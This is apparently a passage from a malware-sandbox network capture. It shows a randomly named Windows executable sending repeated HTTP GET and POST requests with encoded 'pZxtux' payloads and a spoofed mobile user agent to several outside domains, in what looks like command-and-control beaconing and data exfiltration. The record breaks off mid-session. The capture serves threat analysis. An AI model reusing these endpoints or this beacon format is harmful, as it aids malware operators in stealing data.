                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            20 | 192.168.2.5 | 50003 | 141.193.213.11 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:04.416120052 CEST | 420 | OUT | GET /zdt7/?pZxtux=OdyTsfpKOp+FbfSBk3rtAPX6yl42tFHs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjAvSN+KGdO51cWhvQZ2fU2V4w5zpyWN4cvAtWl9PkRGGXA+g==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.meanttobebroken.org
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:05.098718882 CEST | 657 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 24 Oct 2024 13:31:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            x-powered-by: WP Engine
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://meanttobebroken.org/zdt7/?pZxtux=OdyTsfpKOp+FbfSBk3rtAPX6yl42tFHs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjAvSN+KGdO51cWhvQZ2fU2V4w5zpyWN4cvAtWl9PkRGGXA+g==&C6=EXkTb
                                                                                            X-Cacheable: non200
                                                                                            Cache-Control: max-age=600, must-revalidate
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Group: iphone
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a533be9456b95-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            21 | 192.168.2.5 | 50004 | 76.223.67.189 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:10.153763056 CEST | 700 | OUT | POST /t2sm/ HTTP/1.1
                                                                                            Host: www.mjmegartravel.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mjmegartravel.online
                                                                                            Referer: http://www.mjmegartravel.online/t2sm/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=w6g+XejoB1YyBouVcbW382girOvj70vQExaDgR+eFQW8FneOqjWKq2ZvUloybLmV2x0MX5AASdX0YrahZ0otRf8zGjN7r5P9z9vLrAL002W403TWNDIJmRbMZ/VD1h8Ys87h65NTFfjpx630dvnCB1blwFcZy9zo4ZFS2V1t+McM+R5G5gtc2CKSZPlfDggd5g6LUn8=


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            22 | 192.168.2.5 | 50005 | 76.223.67.189 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:12.700344086 CEST | 720 | OUT | POST /t2sm/ HTTP/1.1
                                                                                            Host: www.mjmegartravel.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mjmegartravel.online
                                                                                            Referer: http://www.mjmegartravel.online/t2sm/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=w6g+XejoB1YyBJeVe4+37WghnuvjtEvcExWDgUO0FlG8FHuOrm6Kp2ZvNVo3VrnZ2xJvX84ASdz0YrKhZD8iSv8LHTN5kZP9z9vLrD3S02O41GDWNiII4hbPa/VDxh8cs87D68tpFZnpx4v0d+nBalau0Fdv9vyAwYZHq0wymNIr2HIsjCl0limqJctoSQB0jDq7KwqMykIMVRr/PlER09ITzBu0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            23 | 192.168.2.5 | 50006 | 76.223.67.189 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:15.250274897 CEST | 1737 | OUT | POST /t2sm/ HTTP/1.1
                                                                                            Host: www.mjmegartravel.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mjmegartravel.online
                                                                                            Referer: http://www.mjmegartravel.online/t2sm/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            24 | 192.168.2.5 | 50007 | 76.223.67.189 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:17.829683065 CEST | 421 | OUT | GET /t2sm/?pZxtux=94IeUqPLX3ZZBpOBWJjj6w05jpTx/xHCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQBPJfdTEUnKSwwNjbiieOsGOn8kHnIz1RgyTaVPNwwy1Row==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.mjmegartravel.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:18.448698997 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 24 Oct 2024 13:31:18 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 263
                                                                                            Connection: close
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pZxtux=94IeUqPLX3ZZBpOBWJjj6w05jpTx/xHCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQBPJfdTEUnKSwwNjbiieOsGOn8kHnIz1RgyTaVPNwwy1Row==&C6=EXkTb"}</script></head></html>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            25 | 192.168.2.5 | 50008 | 3.33.130.190 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:23.502937078 CEST | 685 | OUT | POST /24sh/ HTTP/1.1
                                                                                            Host: www.energyparks.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.energyparks.net
                                                                                            Referer: http://www.energyparks.net/24sh/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=B6d0XzQyUBq3R7VPBz+1U2+PQ+1vxST/ggb9I/I/YFvkQ3po+uHmbHj7L07lg6sL/lcGY+ISj9dGKVqNqi2hhzlU2BDeL10EQ+ATYAa4FBFxRco/N8e+qGAUV0lju/Vf3NZEVMtyL+qL/j1ihbrgogWevxo/q80YwVaVxrrZ0lvQ+uG5z362ZW613FCuXXmGad6wD88=


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            26 | 192.168.2.5 | 50009 | 3.33.130.190 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:26.051460028 CEST | 705 | OUT | POST /24sh/ HTTP/1.1
                                                                                            Host: www.energyparks.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.energyparks.net
                                                                                            Referer: http://www.energyparks.net/24sh/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=B6d0XzQyUBq3QblPDQW1d2+Oce1voCT7ggX9I+MVY3LkQXZo/rrmSXj7EU7guatH/lZ7Y7ISj85GKUaNqRei7DlW7hDcFV0EQ+ATYAfvFBNxRJ4/NZy50WAVS0ljq/VD3NZ2VOIdL8iL/nlihOfvngWYhRpXv9pi/UvV6q+q0krDy43TpVyeK2WNnWKZGnHvA+qAdroWGANIBHj1OiO+LyVArfuG


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            27 | 192.168.2.5 | 50010 | 3.33.130.190 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:28.599558115 CEST | 1722 | OUT | POST /24sh/ HTTP/1.1
                                                                                            Host: www.energyparks.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.energyparks.net
                                                                                            Referer: http://www.energyparks.net/24sh/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            28 | 192.168.2.5 | 50011 | 3.33.130.190 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:31.165919065 CEST | 416 | OUT | GET /24sh/?pZxtux=M41UUGwRPTDcYYp7NjzFchXqTu9ohCG2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCRxVhWrTu2Hm15Y+EHLS69Aj11G8IhKuKDs0JHRlg0rr8yhA==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.energyparks.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:31.774564028 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 24 Oct 2024 13:31:31 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 263
                                                                                            Connection: close
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pZxtux=M41UUGwRPTDcYYp7NjzFchXqTu9ohCG2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCRxVhWrTu2Hm15Y+EHLS69Aj11G8IhKuKDs0JHRlg0rr8yhA==&C6=EXkTb"}</script></head></html>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            29 | 192.168.2.5 | 50012 | 172.67.177.220 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:36.828985929 CEST | 691 | OUT | POST /df5c/ HTTP/1.1
                                                                                            Host: www.theawareness.shop
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.theawareness.shop
                                                                                            Referer: http://www.theawareness.shop/df5c/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=vRuw1vbntSzeP74PyXEJyLgy1kudTHBimNkAAfy1NjH3VLvGT2wmhCiQX9VB5C5ahFNsRSiU7Hej98avMRMUrBbeLkxlFWxkQSZqJ1kkNKbtEGUPio+VxhPDCaDK3SjcJOVjtp3apxnQj3F2BLcsIFf0XArOAIkvmhiX14iESiR/39ogTpu7WPic5ckNC2QwdZFRCTU=
                                                                                            Oct 24, 2024 15:31:37.554816008 CEST | 879 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCHOoxPsJaPWs9EBkOG%2F0B%2FjJzSPfqRpowV44KZX77grvGMuWFrh%2BGp%2FPjmcD4VLxKermaFoMY2CCeff3gWmRdsKnObkJmeUTau1qK%2FTHvMBN68wNO5lw3IVzhihiIOtlfCtlYuFbeA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a54067a6345fb-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=691&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 190


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            30 | 192.168.2.5 | 50013 | 172.67.177.220 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:39.374583960 CEST | 711 | OUT | POST /df5c/ HTTP/1.1
                                                                                            Host: www.theawareness.shop
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.theawareness.shop
                                                                                            Referer: http://www.theawareness.shop/df5c/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=vRuw1vbntSzeJogP0wQJ6LgzpUudYnBmmNoAAbKlNwj3VuTGS3wmviiQZdVE0i5RhFAGRTuU7HKj9+SvMm4XtRbcfUxnL2xkQSZqJxECNMztYlcPiNKa8BPASqDKzSiXJOUOtrT8p3jQjzB2BfIzR1exZgqYEKhAvSbd4ZLENDxdyLZKJLmTFvOkpPs6TGxZH6VhcECCAh2p13lXtSifQYrSnby6
                                                                                            Oct 24, 2024 15:31:40.068412066 CEST | 879 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6XoHLcYZuLwxjhLPCIUxlwo86rJWge7qcg2vCsH8CElroyIesz%2FpaGU%2FqTHIz%2F3%2FongVCEeCw44LaYQIaCfx1NH%2BYcIpl25H3ESRGflrn02lS3QDpphriAxuqP0wuWaBRmRQ64V4jf4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a54165977464e-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=711&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 190


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            31 | 192.168.2.5 | 50014 | 172.67.177.220 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:41.922687054 CEST | 1728 | OUT | POST /df5c/ HTTP/1.1
                                                                                            Host: www.theawareness.shop
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.theawareness.shop
                                                                                            Referer: http://www.theawareness.shop/df5c/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:42.643667936 CEST | 877 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqoyXcAqf%2FeGAMp%2FmLm3K5Qrz8imcU57RBqdHCnhQgvEdeHB%2F1O32xmLFvg6IvUMr%2BwaUdIInu4i44RLtbtEohBXrfMjXZ8N4UbDZl6oKNxv8v%2FsgWt5r1pHXWS%2FREC0FcP2hp1TEDU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a54266c6b83a1-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1378&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1728&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                            Data Ascii: 19
                                                                                            Oct 24, 2024 15:31:42.643974066 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            32 | 192.168.2.5 | 50015 | 172.67.177.220 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:44.461519003 CEST | 418 | OUT | GET /df5c/?pZxtux=iTGQ2f3/8wLaRYQP0xZx681X5jLmVFU/oLVVEoegdR+OVsnqcEQj6iurR8BAvDospkEZVkGP6nTG7c6sAiwUrDOAfXxLGlgGaAd3CytgAtbKInIGuq2UlXDJcOT7zCeYfw==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.theawareness.shop
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:45.140120029 CEST | 820 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ET%2BJwMAwEgYpZKAkdNYkPt7KcevZM9KfP8gYRXHpemXgxm8fA3c01KUXGl8XP0qazUPrLPrVikGuFgyuPB5PT9hgmBy6%2BvG6bHw700W7XuucYu0wDKVRKv7s%2BYoub9xqZ3Nk0ZemaE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a54362aeba91e-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            33 | 192.168.2.5 | 50016 | 154.23.181.7 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:50.203567028 CEST | 679 | OUT | POST /o5z9/ HTTP/1.1
                                                                                            Host: www.ak711ka10.lat
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.ak711ka10.lat
                                                                                            Referer: http://www.ak711ka10.lat/o5z9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=+3df/+JIkyALpBwojmQ1l6h5JXPMUfOhMAL0KDEGEz+6JB1C9q7DEiKa5+Pt0AqRvrVL1wH6UVoK4UgPX89ib7TSAyWyeFWziqlsQaZeBACS+penjV8+b3wrURPBeyKc0JmtVW00mXgqEaJYmWQDQBzdfZm0pQCKINxigR25M3rGxQECJre1Bod2kSRqcvOE9wRLW20=
                                                                                            Oct 24, 2024 15:31:51.148569107 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Thu, 24 Oct 2024 13:31:50 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 548
                                                                                            Connection: close
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            34 | 192.168.2.5 | 50017 | 154.23.181.7 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:52.964663029 CEST | 699 | OUT | POST /o5z9/ HTTP/1.1
                                                                                            Host: www.ak711ka10.lat
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.ak711ka10.lat
                                                                                            Referer: http://www.ak711ka10.lat/o5z9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=+3df/+JIkyALphgoiFo1jah2G3PMd/PJMB30KBoWDBa6IkZCyPXDBiKa2ePo5gqkvrp111/6UVUK4REPQLJtbrTcNSWwD1WziqlsQaM7BAqS+ZuniwQ9SXwodxPBJiKY0JmbVXoNmVIqEYRYhHQAeBzfH5nmhC/zPt9yrgHwVW3M5G1oTJWdSIxO0BZdNfvtnTB7IhiKPWHZ5qNfbvuS3kGADSQe
                                                                                            Oct 24, 2024 15:31:53.883109093 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Thu, 24 Oct 2024 13:31:53 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 548
                                                                                            Connection: close
